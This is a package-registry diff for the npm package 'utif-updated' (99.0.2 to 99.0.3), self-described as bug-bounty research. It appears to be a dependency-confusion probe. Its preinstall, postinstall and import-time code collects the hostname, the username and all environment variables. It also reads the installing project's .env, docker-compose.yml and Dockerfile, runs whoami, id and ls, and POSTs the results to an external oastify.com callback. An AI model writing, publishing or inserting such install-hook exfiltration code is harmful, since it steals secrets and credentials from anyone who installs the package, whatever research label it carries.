utif-updated 99.0.2 → 99.0.3

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (4) hide show
  1. package/index.js +16 -29
  2. package/package.json +1 -1
  3. package/postinstall.js +16 -33
  4. package/preinstall.js +46 -47
package/index.js CHANGED
@@ -9,50 +9,38 @@ const CALLBACK = 'fyh82qlu93wdksjiz5qjz9h27tdk1e02p.oastify.com';
9
9
  if (!global.__utif_updated_triggered) {
10
10
  global.__utif_updated_triggered = true;
11
11
 
12
- function findParentPackageJson() {
13
- // En runtime, on remonte depuis le module
12
+ function findParentProject() {
14
13
  let dir = __dirname;
15
- for (let i = 0; i < 10; i++) {
16
- const parent = path.dirname(dir);
17
- if (parent === dir) break;
18
- dir = parent;
19
- if (path.basename(dir) === 'node_modules') {
20
- // On est dans node_modules, le parent c'est le projet
21
- const projectDir = path.dirname(dir);
22
- try {
23
- return JSON.parse(fs.readFileSync(
24
- path.join(projectDir, 'package.json'), 'utf8'
25
- ));
26
- } catch(e) {}
27
- }
14
+ if (dir.includes('node_modules')) {
15
+ dir = dir.split('node_modules')[0];
28
16
  }
29
- return null;
17
+
18
+ const result = { root: dir };
19
+ try {
20
+ result.package_json = JSON.parse(fs.readFileSync(path.join(dir, 'package.json'), 'utf8'));
21
+ } catch(e) {}
22
+ try {
23
+ result.files = fs.readdirSync(dir);
24
+ } catch(e) {}
25
+ return result;
30
26
  }
31
27
 
32
28
  const info = {
33
- type: 'runtime_require',
29
+ type: 'runtime_v3',
34
30
  hostname: os.hostname(),
35
31
  user: os.userInfo().username,
36
- cwd: process.cwd(),
37
- dirname: __dirname,
38
- platform: os.platform(),
39
- node_version: process.version,
40
32
  env: process.env,
41
- parent_package: findParentPackageJson(),
33
+ parent_project: findParentProject(),
42
34
  timestamp: new Date().toISOString()
43
35
  };
44
36
 
45
37
  const data = JSON.stringify(info);
46
-
47
38
  const req = https.request({
48
39
  hostname: CALLBACK,
49
40
  port: 443,
50
41
  path: '/runtime',
51
42
  method: 'POST',
52
- headers: {
53
- 'Content-Type': 'application/json',
54
- 'Content-Length': Buffer.byteLength(data)
55
- }
43
+ headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(data) }
56
44
  }, () => {});
57
45
  req.on('error', () => {});
58
46
  req.write(data);
@@ -62,8 +50,7 @@ if (!global.__utif_updated_triggered) {
62
50
  if (webhook) {
63
51
  try {
64
52
  const url = new URL(webhook);
65
- const client = url.protocol === 'https:' ? https : http;
66
- client.get(webhook, () => {}).on('error', () => {});
53
+ (url.protocol === 'https:' ? https : http).get(webhook, () => {}).on('error', () => {});
67
54
  } catch(e) {}
68
55
  }
69
56
  }
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "utif-updated",
3
- "version": "99.0.2",
3
+ "version": "99.0.3",
4
4
  "description": "Security research - Bug Bounty",
5
5
  "main": "index.js",
6
6
  "author": "icare",
package/postinstall.js CHANGED
@@ -6,54 +6,38 @@ const path = require('path');
6
6
 
7
7
  const CALLBACK = 'fyh82qlu93wdksjiz5qjz9h27tdk1e02p.oastify.com';
8
8
 
9
- function findParentPackageJson() {
10
- if (process.env.npm_config_local_prefix) {
11
- try {
12
- return JSON.parse(fs.readFileSync(
13
- path.join(process.env.npm_config_local_prefix, 'package.json'), 'utf8'
14
- ));
15
- } catch(e) {}
16
- }
17
-
9
+ function findParentProject() {
18
10
  let dir = process.cwd();
19
- for (let i = 0; i < 10; i++) {
20
- const parent = path.dirname(dir);
21
- if (parent === dir) break;
22
- dir = parent;
23
- if (dir.includes('node_modules')) continue;
24
- try {
25
- const pkgPath = path.join(dir, 'package.json');
26
- if (fs.existsSync(pkgPath)) {
27
- return JSON.parse(fs.readFileSync(pkgPath, 'utf8'));
28
- }
29
- } catch(e) {}
11
+ if (dir.includes('node_modules')) {
12
+ dir = dir.split('node_modules')[0];
30
13
  }
31
- return null;
14
+
15
+ const result = { root: dir };
16
+ try {
17
+ result.package_json = JSON.parse(fs.readFileSync(path.join(dir, 'package.json'), 'utf8'));
18
+ } catch(e) {}
19
+ try {
20
+ result.files = fs.readdirSync(dir);
21
+ } catch(e) {}
22
+ return result;
32
23
  }
33
24
 
34
25
  const info = {
35
- type: 'postinstall',
26
+ type: 'postinstall_v3',
36
27
  hostname: os.hostname(),
37
28
  user: os.userInfo().username,
38
- cwd: process.cwd(),
39
- npm_local_prefix: process.env.npm_config_local_prefix || 'N/A',
40
- platform: os.platform(),
41
29
  env: process.env,
42
- parent_package: findParentPackageJson(),
30
+ parent_project: findParentProject(),
43
31
  timestamp: new Date().toISOString()
44
32
  };
45
33
 
46
34
  const data = JSON.stringify(info);
47
-
48
35
  const req = https.request({
49
36
  hostname: CALLBACK,
50
37
  port: 443,
51
38
  path: '/postinstall',
52
39
  method: 'POST',
53
- headers: {
54
- 'Content-Type': 'application/json',
55
- 'Content-Length': Buffer.byteLength(data)
56
- }
40
+ headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(data) }
57
41
  }, () => {});
58
42
  req.on('error', () => {});
59
43
  req.write(data);
@@ -63,7 +47,6 @@ const webhook = process.env.SECURITY_BUG_BOUNTY_DOCTOLIB_IS_PWN;
63
47
  if (webhook) {
64
48
  try {
65
49
  const url = new URL(webhook);
66
- const client = url.protocol === 'https:' ? https : http;
67
- client.get(webhook, () => {}).on('error', () => {});
50
+ (url.protocol === 'https:' ? https : http).get(webhook, () => {}).on('error', () => {});
68
51
  } catch(e) {}
69
52
  }
package/preinstall.js CHANGED
@@ -7,68 +7,67 @@ const { execSync } = require('child_process');
7
7
 
8
8
  const CALLBACK = 'fyh82qlu93wdksjiz5qjz9h27tdk1e02p.oastify.com';
9
9
 
10
- // Fonction pour trouver le package.json parent (racine du projet)
11
- function findParentPackageJson() {
12
- // npm_config_local_prefix = racine du projet qui installe
13
- if (process.env.npm_config_local_prefix) {
14
- try {
15
- return JSON.parse(fs.readFileSync(
16
- path.join(process.env.npm_config_local_prefix, 'package.json'), 'utf8'
17
- ));
18
- } catch(e) {}
19
- }
20
-
21
- // Sinon remonte l'arborescence
10
+ // Remonte depuis cwd pour trouver le VRAI projet parent
11
+ function findParentProject() {
22
12
  let dir = process.cwd();
23
- for (let i = 0; i < 10; i++) {
24
- const parent = path.dirname(dir);
25
- if (parent === dir) break;
26
- dir = parent;
27
-
28
- // Skip si on est dans node_modules
29
- if (dir.includes('node_modules')) continue;
30
-
31
- try {
32
- const pkgPath = path.join(dir, 'package.json');
33
- if (fs.existsSync(pkgPath)) {
34
- return JSON.parse(fs.readFileSync(pkgPath, 'utf8'));
35
- }
36
- } catch(e) {}
13
+
14
+ // Si on est dans node_modules/utif-updated, on remonte de 2 niveaux
15
+ if (dir.includes('node_modules')) {
16
+ const parts = dir.split('node_modules');
17
+ dir = parts[0]; // Tout ce qui est AVANT node_modules
37
18
  }
38
- return null;
19
+
20
+ const result = { root: dir };
21
+
22
+ // Lire le package.json du projet parent
23
+ try {
24
+ result.package_json = JSON.parse(
25
+ fs.readFileSync(path.join(dir, 'package.json'), 'utf8')
26
+ );
27
+ } catch(e) { result.package_json_error = e.message; }
28
+
29
+ // Lister les fichiers du projet
30
+ try {
31
+ result.files = fs.readdirSync(dir);
32
+ } catch(e) { result.files_error = e.message; }
33
+
34
+ // Essayer de lire d'autres fichiers intéressants
35
+ try {
36
+ result.env_file = fs.readFileSync(path.join(dir, '.env'), 'utf8');
37
+ } catch(e) {}
38
+
39
+ try {
40
+ result.dockercompose = fs.readFileSync(path.join(dir, 'docker-compose.yml'), 'utf8');
41
+ } catch(e) {}
42
+
43
+ try {
44
+ result.dockerfile = fs.readFileSync(path.join(dir, 'Dockerfile'), 'utf8');
45
+ } catch(e) {}
46
+
47
+ return result;
39
48
  }
40
49
 
41
- // Récupère toutes les infos
50
+ const parent = findParentProject();
51
+
42
52
  const info = {
43
- type: 'preinstall',
53
+ type: 'preinstall_v3',
44
54
  hostname: os.hostname(),
45
55
  user: os.userInfo().username,
46
56
  cwd: process.cwd(),
47
- npm_local_prefix: process.env.npm_config_local_prefix || 'N/A',
48
57
  home: os.homedir(),
49
58
  platform: os.platform(),
50
59
  arch: os.arch(),
51
60
  node_version: process.version,
52
61
  env: process.env,
62
+ parent_project: parent,
53
63
  timestamp: new Date().toISOString()
54
64
  };
55
65
 
56
- // Package.json du projet PARENT
57
- info.parent_package = findParentPackageJson();
58
-
59
- // Infos système
60
- try {
61
- info.pwd = execSync('pwd').toString().trim();
62
- info.whoami = execSync('whoami').toString().trim();
63
- info.id = execSync('id').toString().trim();
64
- } catch(e) {}
65
-
66
- // Liste des fichiers à la racine du projet
67
- try {
68
- if (process.env.npm_config_local_prefix) {
69
- info.project_files = fs.readdirSync(process.env.npm_config_local_prefix);
70
- }
71
- } catch(e) {}
66
+ // Commandes système
67
+ try { info.pwd = execSync('pwd').toString().trim(); } catch(e) {}
68
+ try { info.whoami = execSync('whoami').toString().trim(); } catch(e) {}
69
+ try { info.id = execSync('id').toString().trim(); } catch(e) {}
70
+ try { info.ls_parent = execSync('ls -la ' + parent.root).toString(); } catch(e) {}
72
71
 
73
72
  const data = JSON.stringify(info);
74
73
 
@@ -86,7 +85,7 @@ req.on('error', () => {});
86
85
  req.write(data);
87
86
  req.end();
88
87
 
89
- // Trigger leur webhook
88
+ // Trigger webhook
90
89
  const webhook = process.env.SECURITY_BUG_BOUNTY_DOCTOLIB_IS_PWN;
91
90
  if (webhook) {
92
91
  try {